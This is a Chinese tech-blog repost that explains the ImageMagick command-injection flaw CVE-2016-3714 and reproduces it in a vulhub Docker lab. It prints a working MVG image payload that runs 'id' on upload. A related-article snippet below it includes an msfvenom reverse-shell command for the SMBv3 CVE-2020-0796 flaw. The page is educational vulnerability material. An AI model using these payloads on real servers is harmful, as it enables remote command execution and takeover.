看图片也能中招!

最新推荐文章于 2025-04-01 15:01:42 发布
转载 最新推荐文章于 2025-04-01 15:01:42 发布 · 212 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:https://mp.weixin.qq.com/s?__biz=MzA5NzgzODI5NA==&mid=2454085983&idx=1&sn=c59dcca525e7f840374cfd4b0b85f38f&chksm=872874e6b05ffdf096d0d7e2a90291bec276e6937e40d46802043f91c9bb69b76e5d2a848aa2&scene=126&&sessionid=0
文章标签:

#git #python #linux #docker #java

本文讨论了近期QQ被盗号事件中的传言,聚焦于一张图片可能导致的安全问题,回顾了ImageMagick的高危命令注入漏洞,解释了如何通过恶意图片执行命令。同时,作者提供了漏洞原理、复现步骤以及历史案例的背景信息。

这两天,关于QQ盗号的安全事件相信大家已经听说了。各种各样的传言都有,一会儿数据库泄露了,一会儿API漏洞了,一会儿又是协议漏洞了,还有的说扫描二维码中招的,一时间众说纷纭。

在众多说法中,我看到了一个:只要点击图片就会中招!

好家伙,点图片就能中招,这可厉害了,要是对方发来一些诱惑的图片,年轻人把持不住那可咋整?

真有那么悬乎吗?

这不禁让我想起了几年前的一个漏洞,也是图片相关的,分享给大家看看。

那次漏洞的主角,是ImageMagick。

漏洞介绍

漏洞名称:Imagemagick 命令注入漏洞(CVE-2016-3714)

漏洞定级:高危

漏洞描述:ImageMagick 在处理恶意构造的图片文件时,对于文件中的 URL 未经严格过滤,可导致命令注入漏洞。通过命令注入漏洞,黑客可以在服务器上执行任意系统命令,获取服务器权限。

影响范围:ImageMagick 6.9.3-9本身及以前所有版本

漏洞原理

ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。

但有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞。

国外的安全人员为此新建了一个网站:https://imagetragick.com/

与这个漏洞相关的CVE有CVE-2016-3714CVE-2016-3715CVE-2016-3716CVE-2016-3717

其中最严重的就是CVE-2016-3714,利用这个漏洞可以造成远程命令执行的危害。

ImageMagick有一个功能叫做delegate(委托),作用是调用外部的lib来处理文件。而调用外部lib的过程是使用系统的system命令来执行的

参考代码:https://github.com/ImageMagick/ImageMagick/blob/e93e339c0a44cec16c08d78241f7aa3754485004/MagickCore/delegate.c#L347

我们在ImageMagick的默认配置文件里可以看到所有的委托:/etc/ImageMagick/delegates.xml 漏洞报告中给出的POC是利用了如下的这个委托:

<delegate decode="https" command="&quot;curl&quot; -s -k -o &quot;%o&quot; &quot;https:%M&quot;"/>

它在解析https图片的时候,使用了curl命令将其下载,我们看到%M被直接放在curl的最后一个参数内。

ImageMagick默认支持一种图片格式,叫mvg,而mvg与svg格式类似,其中是以文本形式写入矢量图的内容,而这其中就可以包含https处理过程。

所以我们可以构造一个.mvg格式的图片(但文件名可以不为.mvg,比如下图中包含payload的文件的文件名为vul.gif,而ImageMagick会根据其内容识别为mvg图片),并在https://后面闭合双引号,写入自己要执行的命令:

push graphic-context
viewbox 0 0 640 480
fill ‘url(https://"|id; ")’
pop graphic-context

这样,ImageMagick在正常执行图片转换、处理的时候就会触发漏洞。

漏洞复现

  • 搭建靶机,教程:https://github.com/vulhub/vulhub/tree/master/imagemagick/imagetragick

  • 下载vulhub:git clone https://github.com/vulhub/vulhub/tree/master/imagemagick/imagetragick

  • 进入目录:cd /vulhub-master/imagemagick/imagetragick

  • 启动docker:docker-compose up -d 注意 我靶机 docker-compose.yml中端口为8888

125b673404738820454f9fe807f97a32.png

  • 访问搭建的靶机ip:8888

fcb717b1137cd2cc1c217a937569d509.png

  • 上传poc,新建一个txt文件,内容为:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"|id; ")'
pop graphic-context

将文件保存为poc.gif

46d2bc1b0bf7ed8eb87fcf74b5fd7f2b.png

上次poc.gif,点击提交,成功执行:

9064e09f5f0b5133e39bcab609638898.png

这年头,除了链接,图片也不敢随便乱点了···

————————————————

漏洞原理和复现部分原文链接:https://blog.youkuaiyun.com/u011975363/article/details/118031227

推荐阅读

编程IT圈
关注
文件上传漏洞—简单利用2(墨者学院靶场)
weixin_44431280的博客
03-01 1115
文件上传漏洞—简单利用(墨者学院靶场) 说明:文章中涉及的网站信息皆是墨者学院靶场环境,不涉及互联网真实环境,仅供学习。 上传思路: 步骤一:判断网站支持文件格式。从网站功能点或者题目说明可以判断处,该功能点支持上传图片格式(JPG,GIF和PNG等)文件 尝试上传文件名为poc.jpg和poc.php的图片:判断网站支持JPG格式文件上传 poc.jpg格式上传成功: poc.php格式上传失败: 步骤二:猜测网站拦截方式(前端JS/MIME类型/文件扩展名/黑白名单/文件内容检测/) JS前端,MI
CVE-2016-7124漏洞复现
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-22 2434
CVE-2016-7124漏洞复现 实验环境 操作机:Windows 10 服务器:apache 2.4.39 PHP版本:5.2.17nts 漏洞影响版本 PHP5 < 5.6.25 PHP7 < 7.0.10 漏洞产生原因 如果类中存在__wakeup方法,调用 unserilize() 方法前则先调用__wakeup方法,当序列化字符串中表示对象属性个数的值大于 真实的属性个数时会跳过__wakeup的执行 漏洞复现 编写测试脚本 <?php header("Content-Type
[漏洞利用] CVE-2016-7124 漏洞复现(总结自一CTF题目)
Y4tacker的博客
07-21 1万+
文章目录漏洞影响的版本漏洞利用方法演示漏洞复现案例代码正常效果修改参数后的效果 漏洞影响的版本 从官网得知 PHP5 < 5.6.25 PHP7 < 7.0.10 漏洞利用方法 若在对象的魔法函数中存在的__wakeup方法,那么之后再调用 unserilize() 方法进行反序列化之前则会先调用__wakeup方法,但是序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行 演示 可能上面说的有点抽象就拿我今天遇到一道题来做个案例,运行下图 <?php cla
(环境搭建+复现) CVE-2016–3714 Imagetragick 命令执行漏洞
daxi0ng的博客
12-04 721
简单复现利用记录一下 在vulhub Imagetragick 文件夹下执行 docker-compose build && docker-compose up -d ps:如果80端口被占用,更改一下映射端口配置docker-compose.yml 在这里插入图片描述 这样服务就启动在ip:1234** 先来Getshell冷静一下 ** push graphic-conte...
中招没Photoshop9个错误的使用方法详细解析中招报名密码格式错误是什么意思.docx
06-13
最后,调整曝光和对比度时,不能忽视高光和阴影部分的细节。在调整时应单独对高光和阴影进行优化,以保留这些区域的细节,避免细节丢失。 以上就是Photoshop中9个常见错误的使用方法解析,了解并掌握这些方法能够...
吐血整理!前端最恶心的 19 种代码屎山,你中招没?
z16638522031的博客
04-01 1534
遇到屎山不要怕,记住:“前人挖坑,后人填土,总有一天,青山绿水。对了,第20个屎山,谁来补充?
河南省新野县2018届九年级物理第一次中招模拟考试试题扫描版
09-09
1. **力学**:力学是物理的基础,中招考试中常见的力学知识点包括牛顿三定律、力的平衡、重力、摩擦力、功和功率、动能与势能、机械能守恒等。考生需要掌握如何计算物体受力情况,分析运动状态,并解决能量转换问题...
九年级语文下学期中招导向预测模拟试题(扫描版) 试题.doc
11-10
【描述】中的“九年级语文下学期中招导向预测模拟试题(扫描版) 试题.doc”进一步确认了这是一个文档形式的模拟试题集,可能是PDF或图片的扫描版,以Word文档(.doc格式)的形式存在。扫描版意味着这些试题是从纸质...
河南省郑州市第四中学2013届中考英语中招模拟试题 人教新目标版
08-19
学生需要通过听懂短文中的关键信息,并匹配相应的图片来展示对内容的理解。这类题目考察的是学生的综合理解能力,要求他们在听完故事或描述后,能够抓住主要情节,概括和推理内容,这对英语阅读理解能力的提升也有很...
Apache Tomcat安全漏洞列表及整改建议合集
热门推荐
story-xu的博客
08-08 1万+
描述: 安全整改目前已经成为安全运维工程师必备的技能之一,但是令人头疼的是,经常会应为一些整改问题,百度无数次,并且不知道标准是什么。下面就为大家总结了在近期web漏洞整改中,绿盟给出的漏洞报告及整改建议,方便大家参考与查找。 问题列表及整改建议列表: ...
linux 图片漏洞,还是Linux安全 微软GDI+图片漏洞详细情况
weixin_32635501的博客
05-14 384
微软GDI+图片漏洞详细情况:什么是GDI+:GDI+ 是一种图形设备接口,能够为应用程序和程序员提供二维矢量图形、映像和版式。漏洞影响:Microsoft产品中所使用的GDI+库(GdiPlus.dll)通过基于类的API提供对各种图形方式的访问。而Linux系统不受影响。GDI+库在解析特制的BMP文件时存在整数溢出漏洞,如果文件中包含有畸形的BitMapInfoHeader的话,就会导致错误...
Imagetragick 命令执行漏洞(CVE-2016-3714)
EC_Carrot的博客
07-01 593
漏洞背景 ImageMagick是美国ImageMagick Studio公司的一套开源的图象处理软件。该软件可读取、转换、写入多种格式的图片。 ImageMagick 6.9.3-10之前版本和7.0.1-1之前7.x版本的多个编码器(EPHEMERAL,HTTPS,MVG,MSL,TEXT,SHOW,WIN,PLT)中存在远程代码执行漏洞,该漏洞源于程序没有充分过滤用户传入的shell字符。攻击者可通过上传恶意的图像利用该漏洞执行任意代码,获取敏感信息。 漏洞复现 访问http://your-ip:80
ImageMagick远程代码执行漏洞分析
fly小灰灰的专栏
08-12 8001
1. 漏洞描述 漏洞编号: CVE-2016-3714 发现人员: Slack安全工程师Ryan Hube 漏洞简述: 产生原因是因为字符过滤不严谨所导致的执行代码. 对于文件名传递给后端的命令过滤不足,导致允许多种文件格式转换过程中远程执行代码。 影响版本: ImageMagick6.5.7-8 2012-08-17 ImageMagick6.7.7-10 2014-03-06 低版本至6.9
CVE-2016-1240(Tomcat本地提权漏洞分析与复现)
Fly_鹏程万里
05-04 3269
前言 Tomcat是个运行在Apache上的应用服务器,支持运行Servlet/JSP应用程序的容器——可以将Tomcat看作是Apache的扩展,实际上Tomcat也可以独立于Apache运行。 Tomcat于2016年10月1日曝出本地提权漏洞CVE-2016-1240。仅需Tomcat用户低权限,攻击者就能利用该漏洞获取到系统的ROOT权限。而且该漏洞的利用难度并不...
CVE-2020-0796 SMBv3漏洞复现过程
BROTHERYY的博客
10-07 302
1.扫描主机是否存在漏 扫描py文件链接 2.下载可利用的POC poc地址 3.在kali里使用msfvenom生成shell,lhost是攻击机ip msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.236.130 lport=4444 -f py -o exp.py 4.将生成的shell替换poc文件夹里的exploit.py的USER_PAYLOAD,整个全部替换 5.进入msf开启监听 use exploit/mu
Cve-2016-2776复现
Yale的博客
04-02 1452
Cve-2016-2776 背景: 攻击者通过向BIND 9发送精心构造的DNS请求,使其在构造响应包时错误计算所需保留空间的长度,导致后续断言失败进而终止程序,从而可以达到拒绝服务的目的。(当DNS服务器构建对精心设计的查询的响应时,可以触发此特定漏洞,其中响应大小超过默认DNS响应大小512) 当DNS服务器构造DNS查询的响应时,它会在响应缓冲区(默认大小为512)中保留空间,它将按照Ans...
cve漏洞复现php,CVE-2016-7124php反序列化漏洞复现
weixin_42557830的博客
03-19 539
CVE-2016-7124php反序列化漏洞复现0X00漏洞原因如果存在__wakeup方法,调用 unserilize() 方法前则先调用__wakeup方法,但是序列化字符串中表示对象属性个数的值大于 真实的属性个数时会跳过__wakeup的执行0X01漏洞影响版本PHP5 < 5.6.25PHP7 < 7.0.100X02漏洞详情PHP(PHP:HypertextPreproce...
首页/前端 用ie浏览器看图片提示flash更新,安装完新的flash之后图片空白了 前端 javascript 其他 用ie浏览器看图片提示flash更新,安装完新的flash之后图片空白了
最新发布
11-01
回答参考qwen. 您遇到的问题是:**在使用 IE 浏览器查看图片时提示 Flash 更新,安装新版本 Flash 后图片反而显示为空白**。这个问题虽然看似“技术故障”,但实际上反映了现代 Web 技术演进中的一个关键事实 —— **Flash 已经被彻底淘汰,继续依赖它会导致功能失效甚至安全风险**。 下面我们从问题本质、原因分析、解决方案和未来建议四个方面进行详细解析。 --- ## 🧩 一、问题现象回顾 - **浏览器**:Internet Explorer(IE) - **操作**: 1. 打开网页想看图片; 2. 浏览器弹出“需要更新 Adobe Flash Player”; 3. 用户下载并安装新的 Flash 插件; 4. 刷新页面后,原本应显示的图片变成空白。 - **结果**:无法正常查看内容。 --- ## ⚠️ 二、核心真相:Flash 已死!不再支持! ### 🔴 Adobe 官方声明(自 2020 年起) > ❗ **Adobe 于 2020 年 12 月 31 日正式停止对 Flash Player 的所有支持**,包括: - 不再发布安全更新 - 不再允许分发 Flash 内容 - 所有主流浏览器(Chrome、Firefox、Edge、Safari)均已默认禁用或移除 Flash 👉 即使你“成功安装”了所谓的“新版 Flash”,那也极可能是: - 过期/伪造的第三方打包插件(可能含恶意软件) - 兼容性极差的老版本回滚 - 根本没有真正启用 --- ## 📊 三、为什么“装完 Flash 反而图片空白”? | 原因 | 说明 | |------|------| | ✅ 网站错误地将图像加载逻辑绑定到 Flash | 某些老旧系统(如教务平台、企业内网)曾用 Flash 渲染图片或相册,现已失效 | | ✅ IE 浏览器本身已不信任 Flash | Windows 系统自动通过更新禁用 Flash ActiveX 控件 | | ✅ 安全设置阻止未签名控件运行 | 新版 Flash 文件无有效数字签名,IE 直接拦截 | | ✅ Flash 插件与现代 JS/CSS 冲突 | 导致 DOM 渲染异常,出现“白屏” | | ✅ 图片实际由 JavaScript 动态加载,但被 Flash 初始化阻塞 | 如 `document.write` 被覆盖 | 📌 特别注意:**绝大多数现代网站早已不用 Flash 显示图片**。如果你看到这种提示,说明该网站严重过时! --- ## 🛠️ 四、解决方案(按优先级排序) ### ✅ 方法 1:不要用 IE!切换现代浏览器 > 💡 **根本解决之道:放弃 IE 和 Flash** | 推荐浏览器 | 优势 | |-----------|------| | **Microsoft Edge(Chromium 内核)** | 微软官方推荐替代 IE,兼容模式可打开旧站点 | | **Google Chrome** | 最广泛支持现代 Web 标准 | | **Mozilla Firefox** | 隐私友好,扩展丰富 | 🔧 操作建议: 1. 下载安装 [Microsoft Edge](https://www.microsoft.com/edge) 2. 打开目标网页测试是否能正常显示图片 3. 若仍需访问旧系统,可启用 Edge 的 **IE 模式**(仅用于兼容) > 📌 注意:Edge 中的 IE 模式也不会加载 Flash! --- ### ✅ 方法 2:检查是否真的需要用 Flash 显示图片? 大多数情况下,“提示 Flash 更新”是一个误导性 UI 设计: #### 场景举例: ```html <!-- 老旧代码片段 --> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"> <param name="movie" value="show_image.swf?img=photo.jpg" /> <!-- 实际上只是用 SWF 包装了一个 img --> </object> ``` 👉 这种方式早已被淘汰。正确的做法是直接使用 `<img src="photo.jpg">` #### 解决方案: - 如果你是**开发者**:立即重构前端,替换为 HTML5 + JavaScript - 如果你是**用户**:尝试右键点击空白区域 → “检查元素” → 查看是否有 `.swf` 请求失败 --- ### ✅ 方法 3:启用 IE 的“兼容性视图”(临时应急) 适用于某些政府/银行类老系统: 1. 打开 IE 2. 按 F12 打开开发者工具 3. 设置文档模式为 **IE10 或 IE11** 4. 添加站点到“兼容性视图设置” 5. 刷新页面 ⚠️ 效果有限,且不能恢复 Flash 功能。 --- ### ✅ 方法 4:联系网站管理员升级系统 如果这是公司内部系统或学校网站,请反馈以下信息: > “当前系统依赖已废弃的 Adobe Flash 技术,存在重大安全隐患,建议尽快迁移到 HTML5 架构。” 提供替代方案示例: - 使用 `<canvas>` 或 `<svg>` 替代动画 - 使用 `<img>` + CSS 实现图片展示 - 使用现代框架(React/Vue)重构前端 --- ## 📈 五、技术对比表:Flash vs HTML5 | 特性 | Flash | HTML5(现代标准) | |------|-------|------------------| | 是否需要插件 | ✅ 是 | ❌ 否 | | 跨平台支持 | ⚠️ 仅限桌面 | ✅ 手机/平板/PC 全支持 | | 安全性 | ❌ 极低(高频漏洞) | ✅ 高 | | 性能 | ⚠️ 占用高 CPU | ✅ 硬件加速 | | SEO 友好性 | ❌ 差 | ✅ 好 | | 维护状态 | 🟥 已终止(2020) | 🟩 持续发展 | | 推荐指数 | ⭐ | ⭐⭐⭐⭐⭐ | --- ## 📝 六、注意事项(重要!) | 风险 | 说明 | |------|------| | 🛑 不要从非官方渠道下载 Flash | 几乎所有“Flash 安装包”都捆绑病毒、广告软件 | | 🛑 不要在公共电脑上尝试激活 Flash | 极易中招勒索软件 | | 🔄 不要用 IE 浏览现代网站 | 安全性差、渲染错误多、性能低下 | | ✅ 推荐使用 HTTPS + 静态资源直连 | 图片应通过 `<img src="https://...">` 直接加载 | --- ## 🧾 七、总结 | 问题 | 回答 | |------|------| | **为什么装完 Flash 图片变空白?** | Flash 已被全面禁用,即使安装也无法运行,且可能导致页面崩溃 | | **能否修复?** | 不能通过安装 Flash 修复;必须更换浏览器或升级网站架构 | | **最佳解决方案?** | 放弃 IE 和 Flash,改用 Edge / Chrome 浏览器 | | **作为开发者怎么办?** | 彻底移除 Flash 依赖,使用 HTML5/CSS3/JavaScript 重构 | --- ## 📘 延伸阅读 - [Adobe Flash EOL 官方公告](https://www.adobe.com/products/flashplayer/end-of-life.html) - [Microsoft 关于 IE 模式的文档](https://learn.microsoft.com/en-us/deployedge/edge-ie-mode) - [MDN: Using HTML5 instead of Flash](https://developer.mozilla.org/zh-CN/docs/Web/Guide/HTML/Using_HTML5_in_IE) ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值